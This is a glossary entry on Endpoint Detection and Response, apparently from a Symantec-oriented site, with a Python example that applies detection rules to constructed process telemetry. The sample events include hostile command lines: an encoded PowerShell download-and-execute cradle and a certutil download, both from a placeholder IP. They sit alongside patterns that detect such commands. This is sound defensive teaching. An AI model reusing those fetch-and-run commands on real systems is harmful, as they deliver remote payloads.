Definition
Endpoint Detection and Response (EDR) continuously records endpoint activity from a kernel-level sensor - process creation with full command lines and parent-child lineage, file operations, registry writes, network connections - and applies detection content (behavioral rules, indicators of compromise, ML models) to that telemetry to surface malicious activity. Unlike traditional antivirus, which blocks known-bad signatures at execution time, EDR assumes some threats will get past prevention and concentrates on detecting, investigating, and responding to them after entry. Modern EDR adds retention (typically 30-90 days of process telemetry, which also bounds how far back an investigation can reach), threat hunting workspaces (analyst-driven queries across the fleet), and response actions (kill process, isolate host from the network, retrieve forensic artifacts). Detections are commonly tagged with MITRE ATT&CK technique IDs so an analyst can see which stage of an intrusion an alert represents. Symantec Endpoint Security Complete includes a full EDR module, competitive with CrowdStrike Falcon Insight and SentinelOne Singularity. Base SES SKUs do not include EDR; the upgrade to SES Complete is a common reason for SEPM-to-SES migrations.
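As an added example (not Symantec's or any other vendor's code), the following Python applies three behavioral rules of the kind described above to a handful of constructed process-creation events: it rebuilds parent-child lineage from retained create events to catch a shell launched anywhere under an Office application, decodes PowerShell -EncodedCommand blobs so the rule and the analyst see the real payload rather than base64, and flags living-off-the-land binaries used as downloaders. The event schema, rule names, ATT&CK mappings and sample telemetry are all assumptions made for illustration.

```python
"""Behavioural detection over EDR-style process telemetry.

Added example, not code from Symantec Endpoint Security or any other
product. The event fields, rule names and the MITRE ATT&CK IDs attached to
each rule are assumptions chosen for illustration; the telemetry below is
constructed by hand, not captured from a real host.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable basename, assumed lower-cased by the sensor
    cmdline: str
    user: str


@dataclass(frozen=True)
class Alert:
    rule: str
    technique: str  # MITRE ATT&CK technique ID the rule is mapped to (assumed)
    pid: int
    detail: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Living-off-the-land binaries and the switch that turns each into a downloader.
LOLBIN_DOWNLOAD_SWITCH = {"certutil.exe": "-urlcache", "bitsadmin.exe": "/transfer"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_CMD_RE = re.compile(r"(?i)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")


def ancestry(by_pid: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Reconstruct the process tree above pid from retained create events.
    The seen-set stops the walk if a reused PID points back into the chain."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; return the
    decoded script, or None when the command line has no such argument."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def run_detections(events: List[ProcEvent]) -> List[Alert]:
    by_pid = {e.pid: e for e in events}
    alerts: List[Alert] = []
    for ev in events:
        parents = ancestry(by_pid, ev.pid)[1:]  # everything above this process
        # Rule 1: a document-handling app anywhere up the tree launching a shell.
        office_parent = next((p for p in parents if p.image in OFFICE_APPS), None)
        if ev.image in SHELLS and office_parent is not None:
            alerts.append(Alert("office_spawns_shell", "T1204.002", ev.pid,
                                f"{office_parent.image} -> {ev.image}"))
        # Rule 2: encoded PowerShell; the alert detail carries the decoded payload.
        if ev.image in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(ev.cmdline)
            if decoded is not None:
                alerts.append(Alert("encoded_powershell", "T1059.001", ev.pid, decoded))
        # Rule 3: LOLBin invoked with its download switch.
        switch = LOLBIN_DOWNLOAD_SWITCH.get(ev.image)
        if switch and switch in ev.cmdline.lower():
            alerts.append(Alert("lolbin_download", "T1105", ev.pid, ev.cmdline))
    return alerts


def _ps_encode(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed telemetry: one macro-driven chain plus a benign admin script (pid 600).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe", "CORP\\jdoe"),
    ProcEvent(200, 100, "winword.exe", '"WINWORD.EXE" /n invoice.docm', "CORP\\jdoe"),
    ProcEvent(300, 200, "cmd.exe", "cmd.exe /c start /min powershell", "CORP\\jdoe"),
    ProcEvent(400, 300, "powershell.exe",
              "powershell.exe -nop -w hidden -enc "
              + _ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
              "CORP\\jdoe"),
    ProcEvent(500, 300, "certutil.exe",
              "certutil.exe -urlcache -split -f http://198.51.100.7/x.exe x.exe", "CORP\\jdoe"),
    ProcEvent(600, 100, "powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1", "CORP\\jdoe"),
]

if __name__ == "__main__":
    for a in run_detections(SAMPLE_EVENTS):
        print(f"[{a.technique}] {a.rule} pid={a.pid}: {a.detail}")
```

The benign event (pid 600) is there on purpose: it uses PowerShell with -ExecutionPolicy Bypass under explorer.exe and must not fire, which is why the encoded-command pattern anchors on whitespace after the switch and the Office rule looks at lineage rather than at the PowerShell process alone. A real sensor would add process-access, module-load and network events to this schema, but the shape of the logic is the same.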
Symantec products that implement this
- Symantec Endpoint Security - AI-driven malware prevention, EDR (in the SES Complete tier), application control, and device control across every endpoint - Windows, macOS, Linux, mobile. Cloud-managed (SES Complete) or on-prem (SEPM).
Related terms
- XDR (Extended Detection and Response) - Detection and response that correlates telemetry across endpoint, network, email, identity, and cloud - beyond EDR's endpoint-only scope.
- SIEM (Security Information and Event Management) - Platform that aggregates security events from across the environment for correlation, search, and alerting.
- SOC (Security Operations Center) - Centralized team responsible for monitoring, detecting, investigating, and responding to security incidents.
- MITRE ATT&CK - Open framework documenting adversary tactics and techniques observed in real-world attacks.
Deep-dives on EDR
- Migrating SEPM 14.x to SES Complete: the engineer's playbook - A real-world playbook for moving from on-prem SEPM 14.x to cloud-managed SES Complete. Discovery, tenant prep, agent conversion, policy migr…
- Symantec licensing in 2026: what each SKU includes (and what it does not) - The Broadcom licensing model for Symantec products is dense. A buyer-side guide to what is actually included in SES Complete, DLP, Cloud SWG…